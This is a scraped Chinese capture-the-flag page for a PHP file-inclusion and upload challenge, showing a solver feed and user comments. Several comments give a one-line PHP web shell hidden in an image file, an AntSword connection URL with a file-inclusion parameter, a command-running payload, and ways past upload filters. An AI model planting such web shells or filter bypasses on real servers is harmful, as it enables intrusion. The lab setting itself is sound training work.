评分(6)
解题动态
wxd12 攻破了该题 1小时前
NOVAX 攻破了该题 2小时前
ywyctf 攻破了该题 23小时前
faulty_robot 攻破了该题 1天前
zhafw 攻破了该题 1天前
mrqh 攻破了该题 1天前
yuxx 攻破了该题 1天前
苏筱 攻破了该题 1天前
sqwx 攻破了该题 1天前
Shinku 攻破了该题 1天前
ajjssjkd 攻破了该题 1天前
qianquan 攻破了该题 1天前
zuoo 攻破了该题 1天前
LeY1Li 攻破了该题 1天前
CHIDRA 攻破了该题 1天前
yanbin 攻破了该题 1天前
wecheer 攻破了该题 1天前
1520622465 攻破了该题 1天前
Ym1ng 攻破了该题 1天前
评论
落叶满阶红 3年前
举报
注意一是屏蔽了<?,需要用<script language=php>写马,二是蚁剑不要直接连接图片,,记得加?file=
HuangYanQwQ 3年前
举报
直接把hello.php改成 /flag 就秒出了
夜雨 4年前
举报
文件上传+图片一句马 题解:https://www.yeyusmile.top/archives/fileinclude2
你能刑 4年前
举报
包含/flag就行
树木有点绿 4年前
举报
无脑/flag直接获得flag哈哈哈
青蛙骑士 4年前
举报
别卷了阿财
liln0te 4年前
举报
看了源码 这里屏蔽了伪协议,文件上传过滤了<?php 和 ?> 这两个 后面那个基本现在都不用了 短标签 `<?=`,`<?` script标签也可以
lysr 4年前
举报
桌面新建文本文档然后输入:<script language="php">@eval($_POST[pass])</script> 再重命名为xx.png,上传之后用中国蚁剑连http://114.67.246.176:16116/index.php?file=upload/202111161218016371.png,显示连接成功
lysr 4年前
举报
桌面新建文本文档然后输入:<script language="php">@eval($_POST[pass])</script> 再重命名为xx.png,上传之后用中国蚁剑连http://114.67.246.176:16116/index.php?file=upload/202111161218016371.png,显示连接成功
109张某 2年前
举报
大佬,中国蚁剑怎么连上的哦,他从服务器端直接过滤了php,直接就把最基本的连接类型阻断了,抓包也不能修改php类型
admin138798 4年前
举报
将<script language=php>system("cat /flag")</script>写成jpg文件上传直接访问就有flag了
狐萝卜CarroT 4年前
举报
什么意思,直接改成/flag就出来了